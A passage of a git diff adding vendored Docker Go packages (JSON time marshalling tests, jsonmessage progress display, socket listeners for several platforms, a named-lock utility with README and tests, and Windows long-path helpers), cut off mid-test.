+func TestFastTimeMarshalJSONWithInvalidDate(t *testing.T) {
+	aTime := time.Date(-1, 1, 1, 0, 0, 0, 0, time.Local)
+	json, err := FastTimeMarshalJSON(aTime)
+	if err == nil {
+		t.Fatalf("FastTimeMarshalJSON should throw an error, but was '%v'", json)
+	}
+	anotherTime := time.Date(10000, 1, 1, 0, 0, 0, 0, time.Local)
+	json, err = FastTimeMarshalJSON(anotherTime)
+	if err == nil {
+		t.Fatalf("FastTimeMarshalJSON should throw an error, but was '%v'", json)
+	}
+
+}
+
+func TestFastTimeMarshalJSON(t *testing.T) {
+	aTime := time.Date(2015, 5, 29, 11, 1, 2, 3, time.UTC)
+	json, err := FastTimeMarshalJSON(aTime)
+	if err != nil {
+		t.Fatal(err)
+	}
+	expected := "\"2015-05-29T11:01:02.000000003Z\""
+	if json != expected {
+		t.Fatalf("Expected %v, got %v", expected, json)
+	}
+
+	location, err := time.LoadLocation("Europe/Paris")
+	if err != nil {
+		t.Fatal(err)
+	}
+	aTime = time.Date(2015, 5, 29, 11, 1, 2, 3, location)
+	json, err = FastTimeMarshalJSON(aTime)
+	if err != nil {
+		t.Fatal(err)
+	}
+	expected = "\"2015-05-29T11:01:02.000000003+02:00\""
+	if json != expected {
+		t.Fatalf("Expected %v, got %v", expected, json)
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/jsonmessage/jsonmessage.go b/vendor/github.com/docker/docker/pkg/jsonmessage/jsonmessage.go
new file mode 100644
index 0000000000..5481433c56
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/jsonmessage/jsonmessage.go
@@ -0,0 +1,225 @@
+package jsonmessage
+
+import (
+	"encoding/json"
+	"fmt"
+	"io"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/pkg/jsonlog"
+	"github.com/docker/docker/pkg/term"
+	"github.com/docker/go-units"
+)
+
+// JSONError wraps a concrete Code and Message, `Code` is
+// is an integer error code, `Message` is the error message.
+type JSONError struct {
+	Code    int    `json:"code,omitempty"`
+	Message string `json:"message,omitempty"`
+}
+
+func (e *JSONError) Error() string {
+	return e.Message
+}
+
+// JSONProgress describes a Progress. terminalFd is the fd of the current terminal,
+// Start is the initial value for the operation. Current is the current status and
+// value of the progress made towards Total. Total is the end value describing when
+// we made 100% progress for an operation.
+type JSONProgress struct {
+	terminalFd uintptr
+	Current    int64 `json:"current,omitempty"`
+	Total      int64 `json:"total,omitempty"`
+	Start      int64 `json:"start,omitempty"`
+}
+
+func (p *JSONProgress) String() string {
+	var (
+		width       = 200
+		pbBox       string
+		numbersBox  string
+		timeLeftBox string
+	)
+
+	ws, err := term.GetWinsize(p.terminalFd)
+	if err == nil {
+		width = int(ws.Width)
+	}
+
+	if p.Current <= 0 && p.Total <= 0 {
+		return ""
+	}
+	current := units.HumanSize(float64(p.Current))
+	if p.Total <= 0 {
+		return fmt.Sprintf("%8v", current)
+	}
+	total := units.HumanSize(float64(p.Total))
+	percentage := int(float64(p.Current)/float64(p.Total)*100) / 2
+	if percentage > 50 {
+		percentage = 50
+	}
+	if width > 110 {
+		// this number can't be negative gh#7136
+		numSpaces := 0
+		if 50-percentage > 0 {
+			numSpaces = 50 - percentage
+		}
+		pbBox = fmt.Sprintf("[%s>%s] ", strings.Repeat("=", percentage), strings.Repeat(" ", numSpaces))
+	}
+
+	numbersBox = fmt.Sprintf("%8v/%v", current, total)
+
+	if p.Current > p.Total {
+		// remove total display if the reported current is wonky.
+		numbersBox = fmt.Sprintf("%8v", current)
+	}
+
+	if p.Current > 0 && p.Start > 0 && percentage < 50 {
+		fromStart := time.Now().UTC().Sub(time.Unix(p.Start, 0))
+		perEntry := fromStart / time.Duration(p.Current)
+		left := time.Duration(p.Total-p.Current) * perEntry
+		left = (left / time.Second) * time.Second
+
+		if width > 50 {
+			timeLeftBox = " " + left.String()
+		}
+	}
+	return pbBox + numbersBox + timeLeftBox
+}
+
+// JSONMessage defines a message struct. It describes
+// the created time, where it from, status, ID of the
+// message. It's used for docker events.
+type JSONMessage struct {
+	Stream          string        `json:"stream,omitempty"`
+	Status          string        `json:"status,omitempty"`
+	Progress        *JSONProgress `json:"progressDetail,omitempty"`
+	ProgressMessage string        `json:"progress,omitempty"` //deprecated
+	ID              string        `json:"id,omitempty"`
+	From            string        `json:"from,omitempty"`
+	Time            int64         `json:"time,omitempty"`
+	TimeNano        int64         `json:"timeNano,omitempty"`
+	Error           *JSONError    `json:"errorDetail,omitempty"`
+	ErrorMessage    string        `json:"error,omitempty"` //deprecated
+	// Aux contains out-of-band data, such as digests for push signing.
+	Aux *json.RawMessage `json:"aux,omitempty"`
+}
+
+// Display displays the JSONMessage to `out`. `isTerminal` describes if `out`
+// is a terminal. If this is the case, it will erase the entire current line
+// when displaying the progressbar.
+func (jm *JSONMessage) Display(out io.Writer, isTerminal bool) error {
+	if jm.Error != nil {
+		if jm.Error.Code == 401 {
+			return fmt.Errorf("Authentication is required.")
+		}
+		return jm.Error
+	}
+	var endl string
+	if isTerminal && jm.Stream == "" && jm.Progress != nil {
+		// <ESC>[2K = erase entire current line
+		fmt.Fprintf(out, "%c[2K\r", 27)
+		endl = "\r"
+	} else if jm.Progress != nil && jm.Progress.String() != "" { //disable progressbar in non-terminal
+		return nil
+	}
+	if jm.TimeNano != 0 {
+		fmt.Fprintf(out, "%s ", time.Unix(0, jm.TimeNano).Format(jsonlog.RFC3339NanoFixed))
+	} else if jm.Time != 0 {
+		fmt.Fprintf(out, "%s ", time.Unix(jm.Time, 0).Format(jsonlog.RFC3339NanoFixed))
+	}
+	if jm.ID != "" {
+		fmt.Fprintf(out, "%s: ", jm.ID)
+	}
+	if jm.From != "" {
+		fmt.Fprintf(out, "(from %s) ", jm.From)
+	}
+	if jm.Progress != nil && isTerminal {
+		fmt.Fprintf(out, "%s %s%s", jm.Status, jm.Progress.String(), endl)
+	} else if jm.ProgressMessage != "" { //deprecated
+		fmt.Fprintf(out, "%s %s%s", jm.Status, jm.ProgressMessage, endl)
+	} else if jm.Stream != "" {
+		fmt.Fprintf(out, "%s%s", jm.Stream, endl)
+	} else {
+		fmt.Fprintf(out, "%s%s\n", jm.Status, endl)
+	}
+	return nil
+}
+
+// DisplayJSONMessagesStream displays a json message stream from `in` to `out`, `isTerminal`
+// describes if `out` is a terminal. If this is the case, it will print `\n` at the end of
+// each line and move the cursor while displaying.
+func DisplayJSONMessagesStream(in io.Reader, out io.Writer, terminalFd uintptr, isTerminal bool, auxCallback func(*json.RawMessage)) error {
+	var (
+		dec = json.NewDecoder(in)
+		ids = make(map[string]int)
+	)
+	for {
+		diff := 0
+		var jm JSONMessage
+		if err := dec.Decode(&jm); err != nil {
+			if err == io.EOF {
+				break
+			}
+			return err
+		}
+
+		if jm.Aux != nil {
+			if auxCallback != nil {
+				auxCallback(jm.Aux)
+			}
+			continue
+		}
+
+		if jm.Progress != nil {
+			jm.Progress.terminalFd = terminalFd
+		}
+		if jm.ID != "" && (jm.Progress != nil || jm.ProgressMessage != "") {
+			line, ok := ids[jm.ID]
+			if !ok {
+				// NOTE: This approach of using len(id) to
+				// figure out the number of lines of history
+				// only works as long as we clear the history
+				// when we output something that's not
+				// accounted for in the map, such as a line
+				// with no ID.
+				line = len(ids)
+				ids[jm.ID] = line
+				if isTerminal {
+					fmt.Fprintf(out, "\n")
+				}
+			}
+			diff = len(ids) - line
+			if isTerminal && diff > 0 {
+				fmt.Fprintf(out, "%c[%dA", 27, diff)
+			}
+		} else {
+			// When outputting something that isn't progress
+			// output, clear the history of previous lines. We
+			// don't want progress entries from some previous
+			// operation to be updated (for example, pull -a
+			// with multiple tags).
+			ids = make(map[string]int)
+		}
+		err := jm.Display(out, isTerminal)
+		if jm.ID != "" && isTerminal && diff > 0 {
+			fmt.Fprintf(out, "%c[%dB", 27, diff)
+		}
+		if err != nil {
+			return err
+		}
+	}
+	return nil
+}
+
+type stream interface {
+	io.Writer
+	FD() uintptr
+	IsTerminal() bool
+}
+
+// DisplayJSONMessagesToStream prints json messages to the output stream
+func DisplayJSONMessagesToStream(in io.Reader, stream stream, auxCallback func(*json.RawMessage)) error {
+	return DisplayJSONMessagesStream(in, stream, stream.FD(), stream.IsTerminal(), auxCallback)
+}
diff --git a/vendor/github.com/docker/docker/pkg/jsonmessage/jsonmessage_test.go b/vendor/github.com/docker/docker/pkg/jsonmessage/jsonmessage_test.go
new file mode 100644
index 0000000000..c6c5b0ed2a
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/jsonmessage/jsonmessage_test.go
@@ -0,0 +1,245 @@
+package jsonmessage
+
+import (
+	"bytes"
+	"fmt"
+	"strings"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/pkg/jsonlog"
+	"github.com/docker/docker/pkg/term"
+)
+
+func TestError(t *testing.T) {
+	je := JSONError{404, "Not found"}
+	if je.Error() != "Not found" {
+		t.Fatalf("Expected 'Not found' got '%s'", je.Error())
+	}
+}
+
+func TestProgress(t *testing.T) {
+	termsz, err := term.GetWinsize(0)
+	if err != nil {
+		// we can safely ignore the err here
+		termsz = nil
+	}
+	jp := JSONProgress{}
+	if jp.String() != "" {
+		t.Fatalf("Expected empty string, got '%s'", jp.String())
+	}
+
+	expected := "     1 B"
+	jp2 := JSONProgress{Current: 1}
+	if jp2.String() != expected {
+		t.Fatalf("Expected %q, got %q", expected, jp2.String())
+	}
+
+	expectedStart := "[==========>                                        ]     20 B/100 B"
+	if termsz != nil && termsz.Width <= 110 {
+		expectedStart = "    20 B/100 B"
+	}
+	jp3 := JSONProgress{Current: 20, Total: 100, Start: time.Now().Unix()}
+	// Just look at the start of the string
+	// (the remaining time is really hard to test -_-)
+	if jp3.String()[:len(expectedStart)] != expectedStart {
+		t.Fatalf("Expected to start with %q, got %q", expectedStart, jp3.String())
+	}
+
+	expected = "[=========================>                         ]     50 B/100 B"
+	if termsz != nil && termsz.Width <= 110 {
+		expected = "    50 B/100 B"
+	}
+	jp4 := JSONProgress{Current: 50, Total: 100}
+	if jp4.String() != expected {
+		t.Fatalf("Expected %q, got %q", expected, jp4.String())
+	}
+
+	// this number can't be negative gh#7136
+	expected = "[==================================================>]     50 B"
+	if termsz != nil && termsz.Width <= 110 {
+		expected = "    50 B"
+	}
+	jp5 := JSONProgress{Current: 50, Total: 40}
+	if jp5.String() != expected {
+		t.Fatalf("Expected %q, got %q", expected, jp5.String())
+	}
+}
+
+func TestJSONMessageDisplay(t *testing.T) {
+	now := time.Now()
+	messages := map[JSONMessage][]string{
+		// Empty
+		JSONMessage{}: {"\n", "\n"},
+		// Status
+		JSONMessage{
+			Status: "status",
+		}: {
+			"status\n",
+			"status\n",
+		},
+		// General
+		JSONMessage{
+			Time:   now.Unix(),
+			ID:     "ID",
+			From:   "From",
+			Status: "status",
+		}: {
+			fmt.Sprintf("%v ID: (from From) status\n", time.Unix(now.Unix(), 0).Format(jsonlog.RFC3339NanoFixed)),
+			fmt.Sprintf("%v ID: (from From) status\n", time.Unix(now.Unix(), 0).Format(jsonlog.RFC3339NanoFixed)),
+		},
+		// General, with nano precision time
+		JSONMessage{
+			TimeNano: now.UnixNano(),
+			ID:       "ID",
+			From:     "From",
+			Status:   "status",
+		}: {
+			fmt.Sprintf("%v ID: (from From) status\n", time.Unix(0, now.UnixNano()).Format(jsonlog.RFC3339NanoFixed)),
+			fmt.Sprintf("%v ID: (from From) status\n", time.Unix(0, now.UnixNano()).Format(jsonlog.RFC3339NanoFixed)),
+		},
+		// General, with both times Nano is preferred
+		JSONMessage{
+			Time:     now.Unix(),
+			TimeNano: now.UnixNano(),
+			ID:       "ID",
+			From:     "From",
+			Status:   "status",
+		}: {
+			fmt.Sprintf("%v ID: (from From) status\n", time.Unix(0, now.UnixNano()).Format(jsonlog.RFC3339NanoFixed)),
+			fmt.Sprintf("%v ID: (from From) status\n", time.Unix(0, now.UnixNano()).Format(jsonlog.RFC3339NanoFixed)),
+		},
+		// Stream over status
+		JSONMessage{
+			Status: "status",
+			Stream: "stream",
+		}: {
+			"stream",
+			"stream",
+		},
+		// With progress message
+		JSONMessage{
+			Status:          "status",
+			ProgressMessage: "progressMessage",
+		}: {
+			"status progressMessage",
+			"status progressMessage",
+		},
+		// With progress, stream empty
+		JSONMessage{
+			Status:   "status",
+			Stream:   "",
+			Progress: &JSONProgress{Current: 1},
+		}: {
+			"",
+			fmt.Sprintf("%c[2K\rstatus      1 B\r", 27),
+		},
+	}
+
+	// The tests :)
+	for jsonMessage, expectedMessages := range messages {
+		// Without terminal
+		data := bytes.NewBuffer([]byte{})
+		if err := jsonMessage.Display(data, false); err != nil {
+			t.Fatal(err)
+		}
+		if data.String() != expectedMessages[0] {
+			t.Fatalf("Expected [%v], got [%v]", expectedMessages[0], data.String())
+		}
+		// With terminal
+		data = bytes.NewBuffer([]byte{})
+		if err := jsonMessage.Display(data, true); err != nil {
+			t.Fatal(err)
+		}
+		if data.String() != expectedMessages[1] {
+			t.Fatalf("Expected [%v], got [%v]", expectedMessages[1], data.String())
+		}
+	}
+}
+
+// Test JSONMessage with an Error. It will return an error with the text as error, not the meaning of the HTTP code.
+func TestJSONMessageDisplayWithJSONError(t *testing.T) {
+	data := bytes.NewBuffer([]byte{})
+	jsonMessage := JSONMessage{Error: &JSONError{404, "Can't find it"}}
+
+	err := jsonMessage.Display(data, true)
+	if err == nil || err.Error() != "Can't find it" {
+		t.Fatalf("Expected a JSONError 404, got [%v]", err)
+	}
+
+	jsonMessage = JSONMessage{Error: &JSONError{401, "Anything"}}
+	err = jsonMessage.Display(data, true)
+	if err == nil || err.Error() != "Authentication is required." {
+		t.Fatalf("Expected an error [Authentication is required.], got [%v]", err)
+	}
+}
+
+func TestDisplayJSONMessagesStreamInvalidJSON(t *testing.T) {
+	var (
+		inFd uintptr
+	)
+	data := bytes.NewBuffer([]byte{})
+	reader := strings.NewReader("This is not a 'valid' JSON []")
+	inFd, _ = term.GetFdInfo(reader)
+
+	if err := DisplayJSONMessagesStream(reader, data, inFd, false, nil); err == nil && err.Error()[:17] != "invalid character" {
+		t.Fatalf("Should have thrown an error (invalid character in ..), got [%v]", err)
+	}
+}
+
+func TestDisplayJSONMessagesStream(t *testing.T) {
+	var (
+		inFd uintptr
+	)
+
+	messages := map[string][]string{
+		// empty string
+		"": {
+			"",
+			""},
+		// Without progress & ID
+		"{ \"status\": \"status\" }": {
+			"status\n",
+			"status\n",
+		},
+		// Without progress, with ID
+		"{ \"id\": \"ID\",\"status\": \"status\" }": {
+			"ID: status\n",
+			fmt.Sprintf("ID: status\n"),
+		},
+		// With progress
+		"{ \"id\": \"ID\", \"status\": \"status\", \"progress\": \"ProgressMessage\" }": {
+			"ID: status ProgressMessage",
+			fmt.Sprintf("\n%c[%dAID: status ProgressMessage%c[%dB", 27, 1, 27, 1),
+		},
+		// With progressDetail
+		"{ \"id\": \"ID\", \"status\": \"status\", \"progressDetail\": { \"Current\": 1} }": {
+			"", // progressbar is disabled in non-terminal
+			fmt.Sprintf("\n%c[%dA%c[2K\rID: status      1 B\r%c[%dB", 27, 1, 27, 27, 1),
+		},
+	}
+	for jsonMessage, expectedMessages := range messages {
+		data := bytes.NewBuffer([]byte{})
+		reader := strings.NewReader(jsonMessage)
+		inFd, _ = term.GetFdInfo(reader)
+
+		// Without terminal
+		if err := DisplayJSONMessagesStream(reader, data, inFd, false, nil); err != nil {
+			t.Fatal(err)
+		}
+		if data.String() != expectedMessages[0] {
+			t.Fatalf("Expected an [%v], got [%v]", expectedMessages[0], data.String())
+		}
+
+		// With terminal
+		data = bytes.NewBuffer([]byte{})
+		reader = strings.NewReader(jsonMessage)
+		if err := DisplayJSONMessagesStream(reader, data, inFd, true, nil); err != nil {
+			t.Fatal(err)
+		}
+		if data.String() != expectedMessages[1] {
+			t.Fatalf("Expected an [%v], got [%v]", expectedMessages[1], data.String())
+		}
+	}
+
+}
diff --git a/vendor/github.com/docker/docker/pkg/listeners/listeners_solaris.go b/vendor/github.com/docker/docker/pkg/listeners/listeners_solaris.go
new file mode 100644
index 0000000000..ff833e3741
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/listeners/listeners_solaris.go
@@ -0,0 +1,31 @@
+package listeners
+
+import (
+	"crypto/tls"
+	"fmt"
+	"net"
+
+	"github.com/docker/go-connections/sockets"
+)
+
+// Init creates new listeners for the server.
+func Init(proto, addr, socketGroup string, tlsConfig *tls.Config) (ls []net.Listener, err error) {
+	switch proto {
+	case "tcp":
+		l, err := sockets.NewTCPSocket(addr, tlsConfig)
+		if err != nil {
+			return nil, err
+		}
+		ls = append(ls, l)
+	case "unix":
+		l, err := sockets.NewUnixSocket(addr, socketGroup)
+		if err != nil {
+			return nil, fmt.Errorf("can't create unix socket %s: %v", addr, err)
+		}
+		ls = append(ls, l)
+	default:
+		return nil, fmt.Errorf("Invalid protocol format: %q", proto)
+	}
+
+	return
+}
diff --git a/vendor/github.com/docker/docker/pkg/listeners/listeners_unix.go b/vendor/github.com/docker/docker/pkg/listeners/listeners_unix.go
new file mode 100644
index 0000000000..1bcae7aa3e
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/listeners/listeners_unix.go
@@ -0,0 +1,94 @@
+// +build !windows,!solaris
+
+package listeners
+
+import (
+	"crypto/tls"
+	"fmt"
+	"net"
+	"strconv"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/coreos/go-systemd/activation"
+	"github.com/docker/go-connections/sockets"
+)
+
+// Init creates new listeners for the server.
+// TODO: Clean up the fact that socketGroup and tlsConfig aren't always used.
+func Init(proto, addr, socketGroup string, tlsConfig *tls.Config) ([]net.Listener, error) {
+	ls := []net.Listener{}
+
+	switch proto {
+	case "fd":
+		fds, err := listenFD(addr, tlsConfig)
+		if err != nil {
+			return nil, err
+		}
+		ls = append(ls, fds...)
+	case "tcp":
+		l, err := sockets.NewTCPSocket(addr, tlsConfig)
+		if err != nil {
+			return nil, err
+		}
+		ls = append(ls, l)
+	case "unix":
+		l, err := sockets.NewUnixSocket(addr, socketGroup)
+		if err != nil {
+			return nil, fmt.Errorf("can't create unix socket %s: %v", addr, err)
+		}
+		ls = append(ls, l)
+	default:
+		return nil, fmt.Errorf("invalid protocol format: %q", proto)
+	}
+
+	return ls, nil
+}
+
+// listenFD returns the specified socket activated files as a slice of
+// net.Listeners or all of the activated files if "*" is given.
+func listenFD(addr string, tlsConfig *tls.Config) ([]net.Listener, error) {
+	var (
+		err       error
+		listeners []net.Listener
+	)
+	// socket activation
+	if tlsConfig != nil {
+		listeners, err = activation.TLSListeners(false, tlsConfig)
+	} else {
+		listeners, err = activation.Listeners(false)
+	}
+	if err != nil {
+		return nil, err
+	}
+
+	if len(listeners) == 0 {
+		return nil, fmt.Errorf("no sockets found via socket activation: make sure the service was started by systemd")
+	}
+
+	// default to all fds just like unix:// and tcp://
+	if addr == "" || addr == "*" {
+		return listeners, nil
+	}
+
+	fdNum, err := strconv.Atoi(addr)
+	if err != nil {
+		return nil, fmt.Errorf("failed to parse systemd fd address: should be a number: %v", addr)
+	}
+	fdOffset := fdNum - 3
+	if len(listeners) < int(fdOffset)+1 {
+		return nil, fmt.Errorf("too few socket activated files passed in by systemd")
+	}
+	if listeners[fdOffset] == nil {
+		return nil, fmt.Errorf("failed to listen on systemd activated file: fd %d", fdOffset+3)
+	}
+	for i, ls := range listeners {
+		if i == fdOffset || ls == nil {
+			continue
+		}
+		if err := ls.Close(); err != nil {
+			// TODO: We shouldn't log inside a library. Remove this or error out.
+			logrus.Errorf("failed to close systemd activated file: fd %d: %v", fdOffset+3, err)
+		}
+	}
+	return []net.Listener{listeners[fdOffset]}, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/listeners/listeners_windows.go b/vendor/github.com/docker/docker/pkg/listeners/listeners_windows.go
new file mode 100644
index 0000000000..5b5a470fc6
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/listeners/listeners_windows.go
@@ -0,0 +1,54 @@
+package listeners
+
+import (
+	"crypto/tls"
+	"fmt"
+	"net"
+	"strings"
+
+	"github.com/Microsoft/go-winio"
+	"github.com/docker/go-connections/sockets"
+)
+
+// Init creates new listeners for the server.
+func Init(proto, addr, socketGroup string, tlsConfig *tls.Config) ([]net.Listener, error) {
+	ls := []net.Listener{}
+
+	switch proto {
+	case "tcp":
+		l, err := sockets.NewTCPSocket(addr, tlsConfig)
+		if err != nil {
+			return nil, err
+		}
+		ls = append(ls, l)
+
+	case "npipe":
+		// allow Administrators and SYSTEM, plus whatever additional users or groups were specified
+		sddl := "D:P(A;;GA;;;BA)(A;;GA;;;SY)"
+		if socketGroup != "" {
+			for _, g := range strings.Split(socketGroup, ",") {
+				sid, err := winio.LookupSidByName(g)
+				if err != nil {
+					return nil, err
+				}
+				sddl += fmt.Sprintf("(A;;GRGW;;;%s)", sid)
+			}
+		}
+		c := winio.PipeConfig{
+			SecurityDescriptor: sddl,
+			MessageMode:        true,  // Use message mode so that CloseWrite() is supported
+			InputBufferSize:    65536, // Use 64KB buffers to improve performance
+			OutputBufferSize:   65536,
+		}
+		l, err := winio.ListenPipe(addr, &c)
+		if err != nil {
+			return nil, err
+		}
+		ls = append(ls, l)
+
+	default:
+		return nil, fmt.Errorf("invalid protocol format: windows only supports tcp and npipe")
+	}
+
+	return ls, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/locker/README.md b/vendor/github.com/docker/docker/pkg/locker/README.md
new file mode 100644
index 0000000000..e84a815cc5
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/locker/README.md
@@ -0,0 +1,65 @@
+Locker
+=====
+
+locker provides a mechanism for creating finer-grained locking to help
+free up more global locks to handle other tasks.
+
+The implementation looks close to a sync.Mutex, however the user must provide a
+reference to use to refer to the underlying lock when locking and unlocking,
+and unlock may generate an error.
+
+If a lock with a given name does not exist when `Lock` is called, one is
+created.
+Lock references are automatically cleaned up on `Unlock` if nothing else is
+waiting for the lock.
+
+
+## Usage
+
+```go
+package important
+
+import (
+	"sync"
+	"time"
+
+	"github.com/docker/docker/pkg/locker"
+)
+
+type important struct {
+	locks *locker.Locker
+	data  map[string]interface{}
+	mu    sync.Mutex
+}
+
+func (i *important) Get(name string) interface{} {
+	i.locks.Lock(name)
+	defer i.locks.Unlock(name)
+	return data[name]
+}
+
+func (i *important) Create(name string, data interface{}) {
+	i.locks.Lock(name)
+	defer i.locks.Unlock(name)
+
+	i.createImportant(data)
+
+	s.mu.Lock()
+	i.data[name] = data
+	s.mu.Unlock()
+}
+
+func (i *important) createImportant(data interface{}) {
+	time.Sleep(10 * time.Second)
+}
+```
+
+For functions dealing with a given name, always lock at the beginning of the
+function (or before doing anything with the underlying state), this ensures any
+other function that is dealing with the same name will block.
+
+When needing to modify the underlying data, use the global lock to ensure nothing
+else is modfying it at the same time.
+Since name lock is already in place, no reads will occur while the modification
+is being performed.
+
diff --git a/vendor/github.com/docker/docker/pkg/locker/locker.go b/vendor/github.com/docker/docker/pkg/locker/locker.go
new file mode 100644
index 0000000000..0b22ddfab8
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/locker/locker.go
@@ -0,0 +1,112 @@
+/*
+Package locker provides a mechanism for creating finer-grained locking to help
+free up more global locks to handle other tasks.
+
+The implementation looks close to a sync.Mutex, however the user must provide a
+reference to use to refer to the underlying lock when locking and unlocking,
+and unlock may generate an error.
+
+If a lock with a given name does not exist when `Lock` is called, one is
+created.
+Lock references are automatically cleaned up on `Unlock` if nothing else is
+waiting for the lock.
+*/
+package locker
+
+import (
+	"errors"
+	"sync"
+	"sync/atomic"
+)
+
+// ErrNoSuchLock is returned when the requested lock does not exist
+var ErrNoSuchLock = errors.New("no such lock")
+
+// Locker provides a locking mechanism based on the passed in reference name
+type Locker struct {
+	mu    sync.Mutex
+	locks map[string]*lockCtr
+}
+
+// lockCtr is used by Locker to represent a lock with a given name.
+type lockCtr struct {
+	mu sync.Mutex
+	// waiters is the number of waiters waiting to acquire the lock
+	// this is int32 instead of uint32 so we can add `-1` in `dec()`
+	waiters int32
+}
+
+// inc increments the number of waiters waiting for the lock
+func (l *lockCtr) inc() {
+	atomic.AddInt32(&l.waiters, 1)
+}
+
+// dec decrements the number of waiters waiting on the lock
+func (l *lockCtr) dec() {
+	atomic.AddInt32(&l.waiters, -1)
+}
+
+// count gets the current number of waiters
+func (l *lockCtr) count() int32 {
+	return atomic.LoadInt32(&l.waiters)
+}
+
+// Lock locks the mutex
+func (l *lockCtr) Lock() {
+	l.mu.Lock()
+}
+
+// Unlock unlocks the mutex
+func (l *lockCtr) Unlock() {
+	l.mu.Unlock()
+}
+
+// New creates a new Locker
+func New() *Locker {
+	return &Locker{
+		locks: make(map[string]*lockCtr),
+	}
+}
+
+// Lock locks a mutex with the given name. If it doesn't exist, one is created
+func (l *Locker) Lock(name string) {
+	l.mu.Lock()
+	if l.locks == nil {
+		l.locks = make(map[string]*lockCtr)
+	}
+
+	nameLock, exists := l.locks[name]
+	if !exists {
+		nameLock = &lockCtr{}
+		l.locks[name] = nameLock
+	}
+
+	// increment the nameLock waiters while inside the main mutex
+	// this makes sure that the lock isn't deleted if `Lock` and `Unlock` are called concurrently
+	nameLock.inc()
+	l.mu.Unlock()
+
+	// Lock the nameLock outside the main mutex so we don't block other operations
+	// once locked then we can decrement the number of waiters for this lock
+	nameLock.Lock()
+	nameLock.dec()
+}
+
+// Unlock unlocks the mutex with the given name
+// If the given lock is not being waited on by any other callers, it is deleted
+func (l *Locker) Unlock(name string) error {
+	l.mu.Lock()
+	nameLock, exists := l.locks[name]
+	if !exists {
+		l.mu.Unlock()
+		return ErrNoSuchLock
+	}
+
+	if nameLock.count() == 0 {
+		delete(l.locks, name)
+	}
+	nameLock.Unlock()
+
+	l.mu.Unlock()
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/locker/locker_test.go b/vendor/github.com/docker/docker/pkg/locker/locker_test.go
new file mode 100644
index 0000000000..5a297dd47b
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/locker/locker_test.go
@@ -0,0 +1,124 @@
+package locker
+
+import (
+	"sync"
+	"testing"
+	"time"
+)
+
+func TestLockCounter(t *testing.T) {
+	l := &lockCtr{}
+	l.inc()
+
+	if l.waiters != 1 {
+		t.Fatal("counter inc failed")
+	}
+
+	l.dec()
+	if l.waiters != 0 {
+		t.Fatal("counter dec failed")
+	}
+}
+
+func TestLockerLock(t *testing.T) {
+	l := New()
+	l.Lock("test")
+	ctr := l.locks["test"]
+
+	if ctr.count() != 0 {
+		t.Fatalf("expected waiters to be 0, got :%d", ctr.waiters)
+	}
+
+	chDone := make(chan struct{})
+	go func() {
+		l.Lock("test")
+		close(chDone)
+	}()
+
+	chWaiting := make(chan struct{})
+	go func() {
+		for range time.Tick(1 * time.Millisecond) {
+			if ctr.count() == 1 {
+				close(chWaiting)
+				break
+			}
+		}
+	}()
+
+	select {
+	case <-chWaiting:
+	case <-time.After(3 * time.Second):
+		t.Fatal("timed out waiting for lock waiters to be incremented")
+	}
+
+	select {
+	case <-chDone:
+		t.Fatal("lock should not have returned while it was still held")
+	default:
+	}
+
+	if err := l.Unlock("test"); err != nil {
+		t.Fatal(err)
+	}
+
+	select {
+	case <-chDone:
+	case <-time.After(3 * time.Second):
+		t.Fatalf("lock should have completed")
+	}
+
+	if ctr.count() != 0 {
+		t.Fatalf("expected waiters to be 0, got: %d", ctr.count())
+	}
+}
+
+func TestLockerUnlock(t *testing.T) {
+	l := New()
+
+	l.Lock("test")
+	l.Unlock("test")
+
+	chDone := make(chan struct{})
+	go func() {
+		l.Lock("test")
+		close(chDone)
+	}()
+
+	select {
+	case <-chDone:
+	case <-time.After(3 * time.Second):
+		t.Fatalf("lock should not be blocked")
+	}
+}
+
+func TestLockerConcurrency(t *testing.T) {
+	l := New()
+
+	var wg sync.WaitGroup
+	for i := 0; i <= 10000; i++ {
+		wg.Add(1)
+		go func() {
+			l.Lock("test")
+			// if there is a concurrency issue, will very likely panic here
+			l.Unlock("test")
+			wg.Done()
+		}()
+	}
+
+	chDone := make(chan struct{})
+	go func() {
+		wg.Wait()
+		close(chDone)
+	}()
+
+	select {
+	case <-chDone:
+	case <-time.After(10 * time.Second):
+		t.Fatal("timeout waiting for locks to complete")
+	}
+
+	// Since everything has unlocked this should not exist anymore
+	if ctr, exists := l.locks["test"]; exists {
+		t.Fatalf("lock should not exist: %v", ctr)
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/longpath/longpath.go b/vendor/github.com/docker/docker/pkg/longpath/longpath.go
new file mode 100644
index 0000000000..9b15bfff4c
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/longpath/longpath.go
@@ -0,0 +1,26 @@
+// longpath introduces some constants and helper functions for handling long paths
+// in Windows, which are expected to be prepended with `\\?\` and followed by either
+// a drive letter, a UNC server\share, or a volume identifier.
+
+package longpath
+
+import (
+	"strings"
+)
+
+// Prefix is the longpath prefix for Windows file paths.
+const Prefix = `\\?\`
+
+// AddPrefix will add the Windows long path prefix to the path provided if
+// it does not already have it.
+func AddPrefix(path string) string {
+	if !strings.HasPrefix(path, Prefix) {
+		if strings.HasPrefix(path, `\\`) {
+			// This is a UNC path, so we need to add 'UNC' to the path as well.
+			path = Prefix + `UNC` + path[1:]
+		} else {
+			path = Prefix + path
+		}
+	}
+	return path
+}
diff --git a/vendor/github.com/docker/docker/pkg/longpath/longpath_test.go b/vendor/github.com/docker/docker/pkg/longpath/longpath_test.go
new file mode 100644
index 0000000000..01865eff09
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/longpath/longpath_test.go
@@ -0,0 +1,22 @@
+package longpath
+
+import (
+	"strings"
+	"testing"
+)
+
+func TestStandardLongPath(t *testing.T) {
+	c := `C:\simple\path`
+	longC := AddPrefix(c)
